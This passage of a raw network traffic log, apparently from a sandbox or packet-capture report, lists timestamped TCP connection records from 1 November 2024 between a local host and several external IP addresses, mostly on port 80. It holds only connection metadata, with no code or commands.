                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.542026043 CET804993913.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.542079926 CET4993980192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.811688900 CET4995080192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.816931963 CET804995034.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.817779064 CET4995080192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.817914009 CET4995080192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.817944050 CET4995080192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.822896004 CET804995034.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:50.823302031 CET804995034.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.798132896 CET804995034.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.798280001 CET4995080192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.803673029 CET804995034.246.200.160192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.803730965 CET4995080192.168.2.834.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.808725119 CET804994918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.811389923 CET4994980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.816489935 CET804994918.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.816543102 CET4994980192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.825489044 CET4995680192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.830352068 CET8049956208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.830415010 CET4995680192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.830564022 CET4995680192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.830589056 CET4995680192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.835416079 CET8049956208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:51.835427046 CET8049956208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.476258039 CET8049956208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.517878056 CET4995680192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.822515965 CET4995680192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.822542906 CET4995680192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.827514887 CET8049956208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.827528954 CET8049956208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.871460915 CET4996280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.876296043 CET804996218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.876403093 CET4996280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.876780033 CET4996280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.876791954 CET4996280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.881781101 CET804996218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.881867886 CET804996218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.969079018 CET8049956208.100.26.245192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.987468958 CET4996580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.992361069 CET804996544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.993724108 CET4996580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.993845940 CET4996580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.993869066 CET4996580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.998686075 CET804996544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:52.998742104 CET804996544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.017858982 CET4995680192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.651650906 CET804996544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.653986931 CET4996580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.659121037 CET804996544.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.662345886 CET4996580192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.669193029 CET4996980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.674134970 CET804996934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.678409100 CET4996980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.678520918 CET4996980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.678536892 CET4996980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.683408976 CET804996934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:53.683420897 CET804996934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.305636883 CET804996218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.308980942 CET4996280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.314152956 CET804996218.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.315648079 CET4996280192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.510951042 CET804996934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.511207104 CET4996980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.516993046 CET804996934.211.97.45192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.517676115 CET4996980192.168.2.834.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.527156115 CET4997580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.531991959 CET804997518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.532059908 CET4997580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.532212019 CET4997580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.532252073 CET4997580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.537213087 CET804997518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.537224054 CET804997518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.550323963 CET4997680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.555244923 CET804997613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.555309057 CET4997680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.560185909 CET4997680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.560322046 CET4997680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.564990997 CET804997613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:54.565134048 CET804997613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.197328091 CET804997518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.197736979 CET4997580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.202912092 CET804997518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.203083992 CET4997580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.218950987 CET4998280192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.223913908 CET80499823.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.224157095 CET4998280192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.224277973 CET4998280192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.224277973 CET4998280192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.229223967 CET80499823.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.229239941 CET80499823.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.981276035 CET804997613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.984378099 CET4997680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.989659071 CET804997613.251.16.150192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:55.990812063 CET4997680192.168.2.813.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.179537058 CET80499823.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.181932926 CET4998280192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.187299967 CET80499823.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.187355995 CET4998280192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.203968048 CET4998880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.205075979 CET4998980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.208975077 CET804998818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.209131002 CET4998880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.209956884 CET804998954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.210113049 CET4998980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.212687969 CET4998880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.212754965 CET4998880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.213047981 CET4998980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.213066101 CET4998980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.217622042 CET804998818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.217838049 CET804998818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.217948914 CET804998954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.217966080 CET804998954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.882668972 CET804998818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.882874966 CET4998880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.888098955 CET804998818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:56.889550924 CET4998880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.029891968 CET804998954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.030095100 CET4998980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.035542965 CET804998954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.037672997 CET4998980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.045110941 CET4999580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.049990892 CET804999554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.051671982 CET4999580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.051839113 CET4999580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.051839113 CET4999580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.056828022 CET804999554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.056849003 CET804999554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.077478886 CET4999680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.082367897 CET804999618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.082434893 CET4999680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.082617044 CET4999680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.082634926 CET4999680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.087903976 CET804999618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.087913990 CET804999618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.888020992 CET804999554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.889292955 CET4999580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.894496918 CET804999554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.894649982 CET4999580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.897125959 CET804999618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.897480011 CET4999680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.902581930 CET804999618.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.903522968 CET5000280192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.904261112 CET4999680192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.908528090 CET805000218.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.908914089 CET5000280192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.909405947 CET5000280192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.909451962 CET5000280192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.914207935 CET805000218.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:57.914218903 CET805000218.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.167459965 CET5000380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.172559023 CET805000344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.172663927 CET5000380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.173311949 CET5000380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.173382998 CET5000380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.178129911 CET805000344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.178186893 CET805000344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.361869097 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.366861105 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.632852077 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.639055967 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.643899918 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.730731964 CET805000218.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.736402035 CET5000280192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.741669893 CET805000218.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.741733074 CET5000280192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.768548012 CET5000880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.773688078 CET805000818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.773756981 CET5000880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.774086952 CET5000880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.774107933 CET5000880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.778857946 CET805000818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.778879881 CET805000818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.825813055 CET805000344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.826004028 CET5000380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.831192017 CET805000344.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:58.831656933 CET5000380192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.045530081 CET5001080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.050707102 CET805001054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.050779104 CET5001080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.050930023 CET5001080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.050955057 CET5001080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.055744886 CET805001054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.055757046 CET805001054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.453759909 CET805000818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.455425978 CET5000880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.460479975 CET805000818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.461680889 CET5000880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.472760916 CET5001480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.477585077 CET805001444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.479008913 CET5001480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.479160070 CET5001480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.479181051 CET5001480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.483953953 CET805001444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.483980894 CET805001444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.897660971 CET805001054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.898758888 CET5001080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.903976917 CET805001054.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:59.905880928 CET5001080192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.139458895 CET805001444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.141752958 CET5001480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.147591114 CET805001444.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.147656918 CET5001480192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.168761015 CET5001780192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.173679113 CET805001772.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.173751116 CET5001780192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.173907995 CET5001780192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.173928976 CET5001780192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.178700924 CET805001772.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.178739071 CET805001772.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.325263023 CET5002080192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.330122948 CET80500203.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.330202103 CET5002080192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.330461025 CET5002080192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.330713034 CET5002080192.168.2.83.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.335412025 CET80500203.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.336107016 CET80500203.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.946537971 CET805001772.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.946594000 CET5001780192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.947536945 CET5001780192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.952301025 CET805001772.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.953679085 CET5002480192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.958528996 CET805002472.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.958611965 CET5002480192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.958745956 CET5002480192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.958772898 CET5002480192.168.2.872.52.178.23
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.963612080 CET805002472.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:00.963624001 CET805002472.52.178.23192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.271684885 CET4995680192.168.2.8208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.415045023 CET80500203.254.94.185192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:01.416028023 CET5002080192.168.2.83.254.94.185
